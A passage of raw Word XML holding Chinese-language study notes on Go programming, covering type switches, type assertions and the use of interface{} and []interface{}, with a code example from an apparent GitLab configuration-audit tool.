        <w:t>case Person:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE90AC5" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("person")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134F229A" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>case Student:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF2B4F" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("student")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5D6CD6" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A25203E" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return get.Get_name()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D529D79" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75701893" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Value.(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：完成类型转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686BB5A3" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for _, v := range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>configs["rules"].([]interface{})</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07242056" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>vv := v.(map[string]interface{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF928DC" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(vv["id"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A13A70" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184BD593" w14:textId="77777777" w:rsidR="00217C24" w:rsidRDefault="00217C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20915064" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C5DC95" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提前声明成员类型和成员方法再调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EABE1D9" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="430411A2" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考案例，见鹏哥写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gi</w:t>
      </w:r>
      <w:r>
        <w:t>tlab-misconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E254F7E" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48674DDE" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="170E23CD" wp14:editId="14803589">
            <wp:extent cx="4580319" cy="2825615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 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形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4587957" cy="2830327"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E232739" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先在外层写接口，仅用于同命名空间下的代码可以调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A48CEC" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>analyzer</w:t>
      </w:r>
      <w:r>
        <w:t>.Analyzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是接口类型，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF240E" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="159275E1" wp14:editId="2EC0F98D">
            <wp:extent cx="5274310" cy="3061335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="51" name="图片 5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形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3061335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7239F" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是具体的实现，在内部。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E7263" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F721D2" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等包下，可以实现接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D957AB" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240527EB" w14:textId="77777777" w:rsidR="0060025F" w:rsidRPr="00EC5EB2" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC5EB2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>type Analyzer struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D93251" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC5EB2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6C465C" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D417DC" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5EB2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(Analyzer) AutoAnalysis</w:t>
      </w:r>
      <w:r>
        <w:t>(gitlabClient *gitlab.Client, options *types.Options, config *viper.Viper) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA3FDA1" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1045F7DC" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>per_page_items := config.GetInt("projects.per_page_items.keywords")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67427BC0" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>max_acquire_items := config.GetInt("projects.max_acquire_items.keywords")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9263DE" w14:textId="77777777" w:rsidR="0060025F" w:rsidRDefault="0060025F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0B9378" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/rickiyang/p/11074173.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26252CC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">interface{} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B339206" w14:textId="4F193381" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">interface{}{} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示这个类型的实例化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE61F50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为函数接受的参数值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664C128E" w14:textId="5006AF6F" w:rsidR="004C452C" w:rsidRDefault="00B45476" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B45476">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>作为一个泛型，接收一切函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD6253" w14:textId="77777777" w:rsidR="00B45476" w:rsidRDefault="00B45476" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F70D144" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以接收任何类型作为他的参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7618E4F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func doAnything(i interface{}){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3414813E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AEF347" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB7B6C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EB8473" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[]interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745045E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[]interface{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为参数也可以承接任何类型的数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC58D20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>interface{}</w:t>
      </w:r>
      <w:r>
        <w:t>可以表示任一类型，不表示</w:t>
      </w:r>
      <w:r>
        <w:t>[]interface{}</w:t>
      </w:r>
      <w:r>
        <w:t>可以表示任意类型的数组，它只是表示这是一个数组，里面你想装啥都可以。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC3CB96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0865ED7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注意，无法将可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.(map[string]interface{})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>interface{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>类型，变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> []interface{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>类型，只能变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> map[string]interface{} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4954D6DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C398D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[]interface{} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只是个类型，确实可以装任何元素的数组，但是你还得初始化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CACDDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074870C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011A4AF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9ED8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDAE036" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD86071" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func getAll(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>vals []interface{}</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8AD4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>for _, val := range vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D9CE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(val)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F17E36F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D2404" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DB8FB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73240B6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>names := []string{"a", "b", "b"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D77984" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>c := 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D8EDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>v := make([]interface{},4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>需要先进行初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E0920" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for i,value :=range names {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0F8DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v[i] = value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26879013" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AEEA51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
